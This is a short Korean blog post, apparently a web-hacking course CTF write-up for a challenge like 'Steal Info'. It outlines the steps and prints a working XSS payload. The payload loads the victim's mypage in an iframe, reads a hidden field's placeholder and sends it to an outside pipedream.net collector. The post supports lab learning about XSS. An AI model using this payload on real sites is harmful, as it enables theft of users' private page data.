Steal Info와 동일하지만 iframe의 대상이 mypage인듯 하다. 그렇다면 Steal Info와 동일하게 진행
1. iframe으로 공격 대상 불러오기
2. iframe내부의 공격 대상이 되는 태그의 데이터를 추출한다
마이페이지의 name이 "info"인 테그의 placeholder를 찾아보자
3. dom이 완성 된 후 데이터를 불러오기
</div>
<iframe src="http://ctf.segfaulthub.com:4343/scriptPrac2/mypage.php?user=p123 " id="target" width="300" height="200"></iframe>
<script>
function afterLoad() {
var target = document.getElementById('target')
var domData = target.contentDocument.getElementsByName("info")[0].placeholder
var i = new Image()
i.src = 'https://enbuhmg3h5bhb.x.pipedream.net/?secret'+domData
}
var i = new Image()
i.onerror = afterLoad
i.src='x'
</script>
<div>
4. 데이터 전송
'웹 해킹 코스 > 과제' 카테고리의 다른 글
12주차 CSRF 문제 풀이(Get Admin2) (0) | 2024.01.22 |
---|---|
12주차 CSRF 문제 풀이(Get Admin1) (0) | 2024.01.22 |
11차 문제 풀이 Steal Info (0) | 2024.01.20 |
XSS 문제풀이 및 보고서 작성하기 (0) | 2024.01.01 |
SQL Injection Point 4 (0) | 2023.12.20 |